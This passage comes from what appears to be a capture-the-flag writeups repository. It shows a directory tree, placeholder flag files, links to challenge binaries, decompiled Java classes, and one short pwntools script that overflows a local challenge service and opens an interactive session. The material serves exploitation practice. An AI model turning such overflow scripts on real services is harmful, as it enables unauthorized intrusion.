├── codegate-2018 ├── rbSql │ ├── images │ │ ├── index.php │ │ ├── 1.jpg │ │ ├── 2.jpg │ │ ├── 3.png │ │ ├── 4.gif │ │ ├── bg.jpg │ │ ├── join.png │ │ ├── k_03.jpg │ │ ├── login.jpg │ │ ├── wine.jpg │ │ ├── cover2.jpg │ │ └── merong.jpg │ ├── 4bbc327f5b0fd076e005961bcfc4a9ee.php │ ├── 5f0c2baaa2c0426eed9a958e3fe0ff94.php │ ├── style.css │ ├── exploit.php │ ├── index.php │ └── dbconn.php ├── zoo │ ├── zoo │ ├── libc.so.6 │ ├── .gdbinit │ ├── structs.c │ ├── helper.py │ ├── dec.c │ └── exploit.py ├── super-marimo │ ├── marimo │ ├── libc.so.6 │ └── exploit.py └── baskin-robins │ ├── BaskinRobins31 │ └── exploit.py ├── csaw-ctf-2013 ├── exploitation-3 │ ├── key │ ├── fil_chal │ └── exploit.py ├── exploitation-1 │ ├── key │ ├── exploit1 │ └── exploit.py └── exploitation-2 │ ├── key │ ├── exploit2 │ └── exploit.py ├── securinets-2018 ├── boobs │ ├── flag.txt │ ├── boobs │ └── exploit.py ├── protect │ ├── protect │ └── exploit.py ├── format-me │ ├── format │ └── exploit.py ├── no-mercy │ ├── libc.so.6 │ ├── no_mercy │ └── exploit.py └── special │ └── writeup ├── tuctf-2018 ├── canary │ ├── flag │ ├── canary │ ├── password │ └── exploit.py └── lisa │ ├── flag │ ├── lisa │ ├── password │ └── exploit.py ├── insomni-hack-17 ├── babyfirst │ ├── flag.txt │ ├── babyfirst │ └── exploit.py └── wheelofrobots │ ├── wheelofrobots │ └── exploit.py ├── insomni-hack-18 ├── magichat │ ├── client │ │ ├── .gitignore │ │ ├── lib │ │ │ ├── commons-lang3-3.7.jar │ │ │ ├── mockito-all-1.9.5.jar │ │ │ └── commons-collections-3.2.2.jar │ │ ├── src │ │ │ └── ch │ │ │ │ └── scrt │ │ │ │ ├── model │ │ │ │ ├── Gem.java │ │ │ │ ├── Frog.java │ │ │ │ ├── Lamp.java │ │ │ │ ├── TeaSet.java │ │ │ │ ├── Wand.java │ │ │ │ ├── Cauldron.java │ │ │ │ ├── Mirror.java │ │ │ │ ├── Broomstick.java │ │ │ │ ├── Scroll.java │ │ │ │ ├── Hat.java │ │ │ │ └── Artifact.java │ │ │ │ ├── WizardAPI.java │ │ │ │ ├── MyExploit.java │ │ │ │ └── Muggle.java │ │ ├── .project │ │ └── .classpath │ ├── server │ │ ├── .gitignore │ │ ├── lib │ │ │ ├── commons-lang3-3.7.jar │ │ │ └── commons-collections-3.2.2.jar │ │ ├── src │ │ │ └── ch │ │ │ │ └── scrt │ │ │ │ ├── model │ │ │ │ ├── Gem.java │ │ │ │ ├── Frog.java │ │ │ │ ├── Lamp.java │ │ │ │ ├── TeaSet.java │ │ │ │ ├── Wand.java │ │ │ │ ├── Cauldron.java │ │ │ │ ├── Mirror.java │ │ │ │ ├── Broomstick.java │ │ │ │ ├── Scroll.java │ │ │ │ ├── Hat.java │ │ │ │ └── Artifact.java │ │ │ │ ├── WizardAPI.java │ │ │ │ ├── Server.java │ │ │ │ └── WizardAPIImpl.java │ │ ├── .project │ │ └── .classpath │ └── README.md └── sapeloshop │ ├── libc-2.23.so │ ├── sapeloshop │ ├── footer.html │ ├── order.html │ ├── header.html │ ├── exploit.py │ └── index.html ├── 34c3ctf-2017 └── 300 │ ├── 300 │ ├── libc.so.6 │ └── exploit.py ├── hacklu-2014 └── oreo │ ├── oreo │ └── exploit.py ├── hacklu-2017 ├── exam │ ├── exam │ └── exploit.py ├── HeapsOfPrint │ ├── libc.so.6 │ ├── HeapsOfPrint │ └── exploit.py ├── heapheaven │ ├── HeapHeaven │ └── exploit.py └── multi-o-flow │ ├── mult-o-flow │ └── exploit.py ├── n1ctf-2018 └── vote │ ├── vote │ ├── libc-2.23.so │ └── exploit.py ├── rctf-2017 ├── rnote │ ├── RNote │ ├── libc.so.6 │ └── exploit.py └── rnote2 │ ├── RNote2 │ ├── libc.so.6 │ └── exploit.py ├── 30c3-2013 └── bigdata │ ├── server │ └── exploit.py ├── rctf-2018 ├── RNote3 │ ├── RNote3 │ ├── libc.so.6 │ └── exploit.py ├── RNote4 │ ├── RNote4 │ ├── libc.so.6 │ └── exploit.py ├── babyheap │ ├── babyheap │ ├── libc.so.6 │ └── exploit.py └── stringer │ ├── libc.so.6 │ ├── stringer │ └── exploit.py ├── asis-finals-2018 └── mem0 │ ├── memo │ └── exploit-16.04.py ├── advent-2021 └── santazon │ ├── santazon │ ├── libc.so.6 │ └── exploit.py ├── defcon-2015 ├── babyecho │ ├── babyecho │ └── exploit.py └── r0pbaby │ ├── r0pbaby │ └── exploit.py ├── hacklu-2015 └── bookstore │ ├── bookstore │ └── exploit.py ├── hitcon-2015 └── blinkroot │ ├── blinkroot │ └── exploit.py ├── 0ctf-quals-2017 └── babyheap │ ├── babyheap │ └── exploit.py ├── acebear-2018 ├── easy_heap │ ├── easy_heap │ ├── easyheap_libc.so.6 │ └── exploit.py └── memo_heap │ ├── memo_heap │ └── exploit.py ├── hitcon-2016 ├── baby-heap-300 │ ├── babyheap │ └── exploit.py ├── secretholder │ ├── secretholder │ └── exploit.py └── sleepyholder │ ├── sleepyholder │ └── exploit.py ├── insomni-hack-finals-18 └── yanc │ ├── yanc │ └── exploit.py ├── meepwn-2018 ├── house_of_card │ ├── libc.so │ ├── house_of_card │ └── exploit.py └── baby-sandbox │ ├── baby-sandbox │ ├── code.c │ └── exploit.py ├── seccon-2017 ├── election-200 │ ├── election │ ├── libc-2.23.so │ └── exploit.py └── videoplayer-500 │ ├── libc.so.6 │ ├── video_player │ └── exploit.py ├── fireshell-2019 └── quotes_list │ ├── libc.so.6 │ ├── quotes_list │ ├── ld-linux-x86-64.so.2 │ └── exploit.py ├── boston-key-party-2016 └── cookbook │ ├── cookbook │ └── exploit.py ├── codegate-2019 └── god-the-reum │ ├── god-the-reum │ ├── libc-2.27.so │ └── exploit.py ├── codegate-final-2015 └── heapster │ ├── heapster │ ├── libc-2.19.so │ └── exploit.py ├── sharif-2018 └── t00p_secrets │ ├── t00p_secrets │ └── exploit.py ├── .gitignore ├── whitehat-grandpix-2018 └── book-store │ ├── BookStore │ ├── libc-2.27.so │ └── exploit.py └── blaze-ctf-2018 └── blazefox ├── test.html ├── exploit.js └── blaze.patch /codegate-2018/rbSql/images/index.php: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /csaw-ctf-2013/exploitation-3/key: -------------------------------------------------------------------------------- 1 | THIS_IS_KEY 2 | -------------------------------------------------------------------------------- /securinets-2018/boobs/flag.txt: -------------------------------------------------------------------------------- 1 | SAMPLE{FLAG} 2 | -------------------------------------------------------------------------------- /tuctf-2018/canary/flag: -------------------------------------------------------------------------------- 1 | flag{test-flag-here} 2 | -------------------------------------------------------------------------------- /tuctf-2018/lisa/flag: -------------------------------------------------------------------------------- 1 | flag{test-flag-here} 2 | -------------------------------------------------------------------------------- /csaw-ctf-2013/exploitation-1/key: -------------------------------------------------------------------------------- 1 | THIS_IS_THE_KEY 2 | -------------------------------------------------------------------------------- /csaw-ctf-2013/exploitation-2/key: -------------------------------------------------------------------------------- 1 | THIS_IS_KEY_FILE 2 | -------------------------------------------------------------------------------- /insomni-hack-17/babyfirst/flag.txt: -------------------------------------------------------------------------------- 1 | my_fake_flag 2 | -------------------------------------------------------------------------------- /insomni-hack-18/magichat/client/.gitignore: -------------------------------------------------------------------------------- 1 | /bin/ 2 | -------------------------------------------------------------------------------- /insomni-hack-18/magichat/server/.gitignore: -------------------------------------------------------------------------------- 1 | /bin/ 2 | -------------------------------------------------------------------------------- /34c3ctf-2017/300/300: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/DhavalKapil/ctf-writeups/HEAD/34c3ctf-2017/300/300 -------------------------------------------------------------------------------- /codegate-2018/rbSql/4bbc327f5b0fd076e005961bcfc4a9ee.php: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | -------------------------------------------------------------------------------- /codegate-2018/zoo/zoo: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/DhavalKapil/ctf-writeups/HEAD/codegate-2018/zoo/zoo -------------------------------------------------------------------------------- /hacklu-2014/oreo/oreo: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/DhavalKapil/ctf-writeups/HEAD/hacklu-2014/oreo/oreo -------------------------------------------------------------------------------- /hacklu-2017/exam/exam: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/DhavalKapil/ctf-writeups/HEAD/hacklu-2017/exam/exam -------------------------------------------------------------------------------- /n1ctf-2018/vote/vote: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/DhavalKapil/ctf-writeups/HEAD/n1ctf-2018/vote/vote -------------------------------------------------------------------------------- /rctf-2017/rnote/RNote: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/DhavalKapil/ctf-writeups/HEAD/rctf-2017/rnote/RNote -------------------------------------------------------------------------------- /tuctf-2018/lisa/lisa: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/DhavalKapil/ctf-writeups/HEAD/tuctf-2018/lisa/lisa -------------------------------------------------------------------------------- /30c3-2013/bigdata/server: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/DhavalKapil/ctf-writeups/HEAD/30c3-2013/bigdata/server -------------------------------------------------------------------------------- /rctf-2017/rnote2/RNote2: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/DhavalKapil/ctf-writeups/HEAD/rctf-2017/rnote2/RNote2 -------------------------------------------------------------------------------- /rctf-2018/RNote3/RNote3: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/DhavalKapil/ctf-writeups/HEAD/rctf-2018/RNote3/RNote3 -------------------------------------------------------------------------------- /rctf-2018/RNote4/RNote4: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/DhavalKapil/ctf-writeups/HEAD/rctf-2018/RNote4/RNote4 -------------------------------------------------------------------------------- /tuctf-2018/canary/canary: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/DhavalKapil/ctf-writeups/HEAD/tuctf-2018/canary/canary -------------------------------------------------------------------------------- /34c3ctf-2017/300/libc.so.6: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/DhavalKapil/ctf-writeups/HEAD/34c3ctf-2017/300/libc.so.6 -------------------------------------------------------------------------------- /asis-finals-2018/mem0/memo: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/DhavalKapil/ctf-writeups/HEAD/asis-finals-2018/mem0/memo -------------------------------------------------------------------------------- /rctf-2017/rnote/libc.so.6: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/DhavalKapil/ctf-writeups/HEAD/rctf-2017/rnote/libc.so.6 -------------------------------------------------------------------------------- /rctf-2017/rnote2/libc.so.6: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/DhavalKapil/ctf-writeups/HEAD/rctf-2017/rnote2/libc.so.6 -------------------------------------------------------------------------------- /rctf-2018/RNote3/libc.so.6: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/DhavalKapil/ctf-writeups/HEAD/rctf-2018/RNote3/libc.so.6 -------------------------------------------------------------------------------- /rctf-2018/RNote4/libc.so.6: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/DhavalKapil/ctf-writeups/HEAD/rctf-2018/RNote4/libc.so.6 -------------------------------------------------------------------------------- /advent-2021/santazon/santazon: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/DhavalKapil/ctf-writeups/HEAD/advent-2021/santazon/santazon -------------------------------------------------------------------------------- /codegate-2018/zoo/libc.so.6: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/DhavalKapil/ctf-writeups/HEAD/codegate-2018/zoo/libc.so.6 -------------------------------------------------------------------------------- /defcon-2015/babyecho/babyecho: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/DhavalKapil/ctf-writeups/HEAD/defcon-2015/babyecho/babyecho -------------------------------------------------------------------------------- /defcon-2015/r0pbaby/r0pbaby: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/DhavalKapil/ctf-writeups/HEAD/defcon-2015/r0pbaby/r0pbaby -------------------------------------------------------------------------------- /n1ctf-2018/vote/libc-2.23.so: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/DhavalKapil/ctf-writeups/HEAD/n1ctf-2018/vote/libc-2.23.so -------------------------------------------------------------------------------- /rctf-2018/babyheap/babyheap: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/DhavalKapil/ctf-writeups/HEAD/rctf-2018/babyheap/babyheap -------------------------------------------------------------------------------- /rctf-2018/babyheap/libc.so.6: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/DhavalKapil/ctf-writeups/HEAD/rctf-2018/babyheap/libc.so.6 -------------------------------------------------------------------------------- /rctf-2018/stringer/libc.so.6: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/DhavalKapil/ctf-writeups/HEAD/rctf-2018/stringer/libc.so.6 -------------------------------------------------------------------------------- /rctf-2018/stringer/stringer: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/DhavalKapil/ctf-writeups/HEAD/rctf-2018/stringer/stringer -------------------------------------------------------------------------------- /securinets-2018/boobs/boobs: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/DhavalKapil/ctf-writeups/HEAD/securinets-2018/boobs/boobs -------------------------------------------------------------------------------- /tuctf-2018/canary/password: -------------------------------------------------------------------------------- 1 | supernotthepasswordpasswordthatisdefinitelynothepasswordsodonteventryitokayokaythanks 2 | -------------------------------------------------------------------------------- /tuctf-2018/lisa/password: -------------------------------------------------------------------------------- 1 | supernotthepasswordpasswordthatisdefinitelynothepasswordsodonteventryitokayokaythanks 2 | -------------------------------------------------------------------------------- /advent-2021/santazon/libc.so.6: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/DhavalKapil/ctf-writeups/HEAD/advent-2021/santazon/libc.so.6 -------------------------------------------------------------------------------- /hacklu-2015/bookstore/bookstore: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/DhavalKapil/ctf-writeups/HEAD/hacklu-2015/bookstore/bookstore -------------------------------------------------------------------------------- /hitcon-2015/blinkroot/blinkroot: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/DhavalKapil/ctf-writeups/HEAD/hitcon-2015/blinkroot/blinkroot -------------------------------------------------------------------------------- /securinets-2018/protect/protect: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/DhavalKapil/ctf-writeups/HEAD/securinets-2018/protect/protect -------------------------------------------------------------------------------- /0ctf-quals-2017/babyheap/babyheap: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/DhavalKapil/ctf-writeups/HEAD/0ctf-quals-2017/babyheap/babyheap -------------------------------------------------------------------------------- /acebear-2018/easy_heap/easy_heap: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/DhavalKapil/ctf-writeups/HEAD/acebear-2018/easy_heap/easy_heap -------------------------------------------------------------------------------- /acebear-2018/memo_heap/memo_heap: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/DhavalKapil/ctf-writeups/HEAD/acebear-2018/memo_heap/memo_heap -------------------------------------------------------------------------------- /codegate-2018/rbSql/images/1.jpg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/DhavalKapil/ctf-writeups/HEAD/codegate-2018/rbSql/images/1.jpg -------------------------------------------------------------------------------- /codegate-2018/rbSql/images/2.jpg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/DhavalKapil/ctf-writeups/HEAD/codegate-2018/rbSql/images/2.jpg -------------------------------------------------------------------------------- /codegate-2018/rbSql/images/3.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/DhavalKapil/ctf-writeups/HEAD/codegate-2018/rbSql/images/3.png -------------------------------------------------------------------------------- /codegate-2018/rbSql/images/4.gif: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/DhavalKapil/ctf-writeups/HEAD/codegate-2018/rbSql/images/4.gif -------------------------------------------------------------------------------- /codegate-2018/rbSql/images/bg.jpg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/DhavalKapil/ctf-writeups/HEAD/codegate-2018/rbSql/images/bg.jpg -------------------------------------------------------------------------------- /codegate-2018/super-marimo/marimo: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/DhavalKapil/ctf-writeups/HEAD/codegate-2018/super-marimo/marimo -------------------------------------------------------------------------------- /codegate-2018/zoo/.gdbinit: -------------------------------------------------------------------------------- 1 | !gcc -gstabs -c structs.c -o structs.o 2 | add-symbol-file structs.o 0 3 | 4 | source helper.py 5 | -------------------------------------------------------------------------------- /hacklu-2017/HeapsOfPrint/libc.so.6: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/DhavalKapil/ctf-writeups/HEAD/hacklu-2017/HeapsOfPrint/libc.so.6 -------------------------------------------------------------------------------- /hacklu-2017/heapheaven/HeapHeaven: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/DhavalKapil/ctf-writeups/HEAD/hacklu-2017/heapheaven/HeapHeaven -------------------------------------------------------------------------------- /hitcon-2016/baby-heap-300/babyheap: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/DhavalKapil/ctf-writeups/HEAD/hitcon-2016/baby-heap-300/babyheap -------------------------------------------------------------------------------- /insomni-hack-finals-18/yanc/yanc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/DhavalKapil/ctf-writeups/HEAD/insomni-hack-finals-18/yanc/yanc -------------------------------------------------------------------------------- /meepwn-2018/house_of_card/libc.so: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/DhavalKapil/ctf-writeups/HEAD/meepwn-2018/house_of_card/libc.so -------------------------------------------------------------------------------- /seccon-2017/election-200/election: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/DhavalKapil/ctf-writeups/HEAD/seccon-2017/election-200/election -------------------------------------------------------------------------------- /securinets-2018/format-me/format: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/DhavalKapil/ctf-writeups/HEAD/securinets-2018/format-me/format -------------------------------------------------------------------------------- /securinets-2018/no-mercy/libc.so.6: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/DhavalKapil/ctf-writeups/HEAD/securinets-2018/no-mercy/libc.so.6 -------------------------------------------------------------------------------- /securinets-2018/no-mercy/no_mercy: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/DhavalKapil/ctf-writeups/HEAD/securinets-2018/no-mercy/no_mercy -------------------------------------------------------------------------------- /codegate-2018/rbSql/images/join.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/DhavalKapil/ctf-writeups/HEAD/codegate-2018/rbSql/images/join.png -------------------------------------------------------------------------------- /codegate-2018/rbSql/images/k_03.jpg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/DhavalKapil/ctf-writeups/HEAD/codegate-2018/rbSql/images/k_03.jpg -------------------------------------------------------------------------------- /codegate-2018/rbSql/images/login.jpg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/DhavalKapil/ctf-writeups/HEAD/codegate-2018/rbSql/images/login.jpg -------------------------------------------------------------------------------- /codegate-2018/rbSql/images/wine.jpg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/DhavalKapil/ctf-writeups/HEAD/codegate-2018/rbSql/images/wine.jpg -------------------------------------------------------------------------------- /codegate-2018/super-marimo/libc.so.6: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/DhavalKapil/ctf-writeups/HEAD/codegate-2018/super-marimo/libc.so.6 -------------------------------------------------------------------------------- /fireshell-2019/quotes_list/libc.so.6: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/DhavalKapil/ctf-writeups/HEAD/fireshell-2019/quotes_list/libc.so.6 -------------------------------------------------------------------------------- /hacklu-2017/multi-o-flow/mult-o-flow: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/DhavalKapil/ctf-writeups/HEAD/hacklu-2017/multi-o-flow/mult-o-flow -------------------------------------------------------------------------------- /insomni-hack-17/babyfirst/babyfirst: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/DhavalKapil/ctf-writeups/HEAD/insomni-hack-17/babyfirst/babyfirst -------------------------------------------------------------------------------- /boston-key-party-2016/cookbook/cookbook: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/DhavalKapil/ctf-writeups/HEAD/boston-key-party-2016/cookbook/cookbook -------------------------------------------------------------------------------- /codegate-2018/rbSql/images/cover2.jpg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/DhavalKapil/ctf-writeups/HEAD/codegate-2018/rbSql/images/cover2.jpg -------------------------------------------------------------------------------- /codegate-2018/rbSql/images/merong.jpg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/DhavalKapil/ctf-writeups/HEAD/codegate-2018/rbSql/images/merong.jpg -------------------------------------------------------------------------------- /codegate-2019/god-the-reum/god-the-reum: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/DhavalKapil/ctf-writeups/HEAD/codegate-2019/god-the-reum/god-the-reum -------------------------------------------------------------------------------- /codegate-2019/god-the-reum/libc-2.27.so: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/DhavalKapil/ctf-writeups/HEAD/codegate-2019/god-the-reum/libc-2.27.so -------------------------------------------------------------------------------- /codegate-final-2015/heapster/heapster: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/DhavalKapil/ctf-writeups/HEAD/codegate-final-2015/heapster/heapster -------------------------------------------------------------------------------- /csaw-ctf-2013/exploitation-1/exploit1: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/DhavalKapil/ctf-writeups/HEAD/csaw-ctf-2013/exploitation-1/exploit1 -------------------------------------------------------------------------------- /csaw-ctf-2013/exploitation-2/exploit2: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/DhavalKapil/ctf-writeups/HEAD/csaw-ctf-2013/exploitation-2/exploit2 -------------------------------------------------------------------------------- /csaw-ctf-2013/exploitation-3/fil_chal: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/DhavalKapil/ctf-writeups/HEAD/csaw-ctf-2013/exploitation-3/fil_chal -------------------------------------------------------------------------------- /fireshell-2019/quotes_list/quotes_list: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/DhavalKapil/ctf-writeups/HEAD/fireshell-2019/quotes_list/quotes_list -------------------------------------------------------------------------------- /hacklu-2017/HeapsOfPrint/HeapsOfPrint: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/DhavalKapil/ctf-writeups/HEAD/hacklu-2017/HeapsOfPrint/HeapsOfPrint -------------------------------------------------------------------------------- /hitcon-2016/secretholder/secretholder: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/DhavalKapil/ctf-writeups/HEAD/hitcon-2016/secretholder/secretholder -------------------------------------------------------------------------------- /hitcon-2016/sleepyholder/sleepyholder: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/DhavalKapil/ctf-writeups/HEAD/hitcon-2016/sleepyholder/sleepyholder -------------------------------------------------------------------------------- /insomni-hack-18/sapeloshop/libc-2.23.so: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/DhavalKapil/ctf-writeups/HEAD/insomni-hack-18/sapeloshop/libc-2.23.so -------------------------------------------------------------------------------- /insomni-hack-18/sapeloshop/sapeloshop: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/DhavalKapil/ctf-writeups/HEAD/insomni-hack-18/sapeloshop/sapeloshop -------------------------------------------------------------------------------- /meepwn-2018/baby-sandbox/baby-sandbox: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/DhavalKapil/ctf-writeups/HEAD/meepwn-2018/baby-sandbox/baby-sandbox -------------------------------------------------------------------------------- /meepwn-2018/house_of_card/house_of_card: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/DhavalKapil/ctf-writeups/HEAD/meepwn-2018/house_of_card/house_of_card -------------------------------------------------------------------------------- /seccon-2017/election-200/libc-2.23.so: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/DhavalKapil/ctf-writeups/HEAD/seccon-2017/election-200/libc-2.23.so -------------------------------------------------------------------------------- /seccon-2017/videoplayer-500/libc.so.6: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/DhavalKapil/ctf-writeups/HEAD/seccon-2017/videoplayer-500/libc.so.6 -------------------------------------------------------------------------------- /sharif-2018/t00p_secrets/t00p_secrets: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/DhavalKapil/ctf-writeups/HEAD/sharif-2018/t00p_secrets/t00p_secrets -------------------------------------------------------------------------------- /.gitignore: -------------------------------------------------------------------------------- 1 | *.i64 2 | *.id* 3 | *.nam 4 | *.til 5 | *~ 6 | .\#* 7 | \#* 8 | core 9 | .gdb_history 10 | *.class 11 | 12 | todo 13 | -------------------------------------------------------------------------------- /acebear-2018/easy_heap/easyheap_libc.so.6: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/DhavalKapil/ctf-writeups/HEAD/acebear-2018/easy_heap/easyheap_libc.so.6 -------------------------------------------------------------------------------- /codegate-final-2015/heapster/libc-2.19.so: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/DhavalKapil/ctf-writeups/HEAD/codegate-final-2015/heapster/libc-2.19.so -------------------------------------------------------------------------------- /insomni-hack-18/magichat/README.md: -------------------------------------------------------------------------------- 1 | # MagicHat 2 | 3 | To implement locally, I have written a dummy server that emulates the actual one. 4 | -------------------------------------------------------------------------------- /seccon-2017/videoplayer-500/video_player: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/DhavalKapil/ctf-writeups/HEAD/seccon-2017/videoplayer-500/video_player -------------------------------------------------------------------------------- /codegate-2018/baskin-robins/BaskinRobins31: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/DhavalKapil/ctf-writeups/HEAD/codegate-2018/baskin-robins/BaskinRobins31 -------------------------------------------------------------------------------- /insomni-hack-17/wheelofrobots/wheelofrobots: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/DhavalKapil/ctf-writeups/HEAD/insomni-hack-17/wheelofrobots/wheelofrobots -------------------------------------------------------------------------------- /whitehat-grandpix-2018/book-store/BookStore: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/DhavalKapil/ctf-writeups/HEAD/whitehat-grandpix-2018/book-store/BookStore -------------------------------------------------------------------------------- /whitehat-grandpix-2018/book-store/libc-2.27.so: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/DhavalKapil/ctf-writeups/HEAD/whitehat-grandpix-2018/book-store/libc-2.27.so -------------------------------------------------------------------------------- /fireshell-2019/quotes_list/ld-linux-x86-64.so.2: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/DhavalKapil/ctf-writeups/HEAD/fireshell-2019/quotes_list/ld-linux-x86-64.so.2 -------------------------------------------------------------------------------- /insomni-hack-18/magichat/client/lib/commons-lang3-3.7.jar: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/DhavalKapil/ctf-writeups/HEAD/insomni-hack-18/magichat/client/lib/commons-lang3-3.7.jar -------------------------------------------------------------------------------- /insomni-hack-18/magichat/client/lib/mockito-all-1.9.5.jar: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/DhavalKapil/ctf-writeups/HEAD/insomni-hack-18/magichat/client/lib/mockito-all-1.9.5.jar -------------------------------------------------------------------------------- /insomni-hack-18/magichat/server/lib/commons-lang3-3.7.jar: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/DhavalKapil/ctf-writeups/HEAD/insomni-hack-18/magichat/server/lib/commons-lang3-3.7.jar -------------------------------------------------------------------------------- /blaze-ctf-2018/blazefox/test.html: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | 6 | 7 | 8 | 9 | -------------------------------------------------------------------------------- /insomni-hack-18/magichat/client/lib/commons-collections-3.2.2.jar: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/DhavalKapil/ctf-writeups/HEAD/insomni-hack-18/magichat/client/lib/commons-collections-3.2.2.jar -------------------------------------------------------------------------------- /insomni-hack-18/magichat/server/lib/commons-collections-3.2.2.jar: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/DhavalKapil/ctf-writeups/HEAD/insomni-hack-18/magichat/server/lib/commons-collections-3.2.2.jar -------------------------------------------------------------------------------- /csaw-ctf-2013/exploitation-1/exploit.py: -------------------------------------------------------------------------------- 1 | from pwn import * 2 | 3 | p = process("./exploit1") 4 | 5 | conn = remote("localhost", 31337) 6 | 7 | payload = "a"*1020 8 | conn.sendline(payload) 9 | conn.interactive() -------------------------------------------------------------------------------- /insomni-hack-18/magichat/client/src/ch/scrt/model/Gem.java: -------------------------------------------------------------------------------- 1 | /* 2 | * Decompiled with CFR 0_124. 3 | */ 4 | package ch.scrt.model; 5 | 6 | import ch.scrt.model.Artifact; 7 | 8 | public class Gem 9 | extends Artifact { 10 | private static final long serialVersionUID = -6218570363073309827L; 11 | } 12 | 13 | -------------------------------------------------------------------------------- /insomni-hack-18/magichat/server/src/ch/scrt/model/Gem.java: -------------------------------------------------------------------------------- 1 | /* 2 | * Decompiled with CFR 0_124. 3 | */ 4 | package ch.scrt.model; 5 | 6 | import ch.scrt.model.Artifact; 7 | 8 | public class Gem 9 | extends Artifact { 10 | private static final long serialVersionUID = -6218570363073309827L; 11 | } 12 | 13 | -------------------------------------------------------------------------------- /insomni-hack-18/magichat/client/src/ch/scrt/model/Frog.java: -------------------------------------------------------------------------------- 1 | /* 2 | * Decompiled with CFR 0_124. 3 | */ 4 | package ch.scrt.model; 5 | 6 | import ch.scrt.model.Artifact; 7 | 8 | public class Frog 9 | extends Artifact { 10 | private static final long serialVersionUID = 1541961207696730155L; 11 | } 12 | 13 | -------------------------------------------------------------------------------- /insomni-hack-18/magichat/client/src/ch/scrt/model/Lamp.java: -------------------------------------------------------------------------------- 1 | /* 2 | * Decompiled with CFR 0_124. 3 | */ 4 | package ch.scrt.model; 5 